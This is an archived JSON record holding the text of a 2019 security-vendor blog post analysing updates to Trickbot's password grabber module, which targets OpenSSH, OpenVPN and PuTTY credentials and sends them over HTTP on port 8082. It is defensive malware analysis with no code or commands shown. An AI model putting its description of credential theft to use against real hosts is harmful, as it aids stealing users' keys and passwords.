{
	"id": "e6a7e49b-aa09-46f3-a276-78e3edee2351",
	"created_at": "2026-04-06T00:10:02.499189Z",
	"updated_at": "2026-04-10T03:20:29.944134Z",
	"deleted_at": null,
	"sha1_hash": "edb7a1b5af3e7e1fe77ea7be76900953b2d68795",
	"title": "Trickbot Updates Password Grabber Module",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 12271160,
	"plain_text": "Trickbot Updates Password Grabber Module\r\nBy Brad Duncan\r\nPublished: 2019-11-22 · Archived: 2026-04-05 17:56:16 UTC\r\nFirst seen in 2016, Trickbot is malware that steals system information, login credentials, and other sensitive data\r\nfrom vulnerable Windows hosts. Trickbot is a modular malware, and one of its modules is a password grabber. In\r\nNovember 2019, we started seeing indicators of Trickbot's password grabber targeting data from OpenSSH and\r\nOpenVPN applications.\r\nTrickbot Modules\r\nA Windows host infected with Trickbot downloads different modules to perform various functions. These modules\r\nare stored as encrypted binaries in a folder located under the infected user’s AppData\\Roaming directory. The\r\nencrypted binaries are decoded as DLL files and run from system memory. Figure 1 shows encoded Trickbot\r\nmodules generated by a recent Trickbot infection on a 64-bit Windows 7 host from Friday November 8th, 2019.\r\nFigure 1. Modules from a Trickbot infection on November 8th, 2019.\r\nPassword Grabber Module\r\nhttps://unit42.paloaltonetworks.com/trickbot-updates-password-grabber-module/\r\nPage 1 of 7\n\nAs seen in Figure 1, one of the modules is named pwgrab64. This is a password grabber used by Trickbot. This\r\nmodule retrieves login credentials stored in a victim's browser cache, and it also obtains login credentials from\r\nother applications installed on a victim’s host. The password grabber and some other Trickbot modules send stolen\r\ndata using unencrypted HTTP over TCP port 8082 to an IP address used by Trickbot. For example, Figure 2 shows\r\ninformation from a packet capture (pcap) of traffic generated by a host infected with Trickbot. It highlights an\r\nexample of login credentials stolen from an infected user’s Chrome browser cache. Note how the URL in the\r\nHTTP POST request ends with the number 81. This number is used in URLs generated by Trickbot's password\r\ngrabber module.\r\nFigure 2. Login credentials stolen from an infected user’s Chrome browser cache.\r\nUpdates to Password Grabber\r\nTraffic patterns from recent Trickbot infections had been fairly consistent until early November 2019, when we\r\nstarted seeing two new HTTP POST requests caused by the password grabber. They are identified as:\r\nOpenSSH private keys\r\nOpenVPN passwords and configsls\r\nFor the OpenVPN line, configsls might be a misspelling of configs. Figure 3 and Figure 4 show examples of\r\nHTTP POST requests that contain these identifiers.\r\nhttps://unit42.paloaltonetworks.com/trickbot-updates-password-grabber-module/\r\nPage 2 of 7\n\nFigure 3. HTTP POST request caused by Trickbot's password grabber for OpenSSH private keys.\r\nFigure 4. HTTP POST request caused by Trickbot's password grabber for OpenVPN passwords and\r\nconfigurations.\r\nAre These Updates Broken?\r\nhttps://unit42.paloaltonetworks.com/trickbot-updates-password-grabber-module/\r\nPage 3 of 7\n\nThese updates to Trickbot's password grabber module may not be fully functional. HTTP POST requests caused\r\nby the password grabber for OpenSSH and OpenVPN occur whether or not the victim's host has OpenSSH or\r\nOpenVPN installed. And we have not seen this traffic contain any actual data.\r\nWe generated Trickbot infections in lab environments for both Windows 7 and Windows 10 hosts with configured\r\nOpenSSH and OpenVPN applications. However, we have not seen any working results. HTTP POST requests\r\ngenerated by the password grabber for OpenSSH and OpenVPN during these infections contained no data.\r\nHowever, Trickbot’s password grabber works will grab SSH passwords and private keys from an SSH/Telnet\r\nclient named PuTTY. Figure 5 and Figure 6 shows password grabber activity from a Trickbot-infected host with\r\nPuTTY installed and configured to use a private key for an SSH connection to a cloud server.\r\nhttps://unit42.paloaltonetworks.com/trickbot-updates-password-grabber-module/\r\nPage 4 of 7\n\nFigure 5. HTTP POST request caused by Trickbot's password grabber for PuTTY passwords.\r\nhttps://unit42.paloaltonetworks.com/trickbot-updates-password-grabber-module/\r\nPage 5 of 7\n\nFigure 6. HTTP POST request caused by Trickbot's password grabber for private keys used by PuTTY.\r\nConclusion\r\nThis blog post documents recent changes in Trickbot traffic patterns that indicate updates to its password grabber\r\nmodule. These updates appear to target data from OpenSSH and OpenVPN applications, but this functionality\r\ndoes not appear to work. Regardless, Trickbot's password grabber will grab sensitive data like private keys from\r\nSSH-related applications like PuTTY.\r\nThese updated traffic patterns demonstrate Trickbot continues to evolve. However, best security practices like\r\nrunning fully-patched and up-to-date versions of Microsoft Windows will hinder or stop Trickbot infections. Palo\r\nhttps://unit42.paloaltonetworks.com/trickbot-updates-password-grabber-module/\r\nPage 6 of 7\n\nAlto Networks customers are further protected from Trickbot by our threat prevention platform. AutoFocus users\r\ncan track Trickbot activity by using the Trickbot tag.\r\nSource: https://unit42.paloaltonetworks.com/trickbot-updates-password-grabber-module/\r\nhttps://unit42.paloaltonetworks.com/trickbot-updates-password-grabber-module/\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/trickbot-updates-password-grabber-module/"
	],
	"report_names": [
		"trickbot-updates-password-grabber-module"
	],
	"threat_actors": [],
	"ts_created_at": 1775434202,
	"ts_updated_at": 1775791229,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/edb7a1b5af3e7e1fe77ea7be76900953b2d68795.pdf",
		"text": "https://archive.orkl.eu/edb7a1b5af3e7e1fe77ea7be76900953b2d68795.txt",
		"img": "https://archive.orkl.eu/edb7a1b5af3e7e1fe77ea7be76900953b2d68795.jpg"
	}
}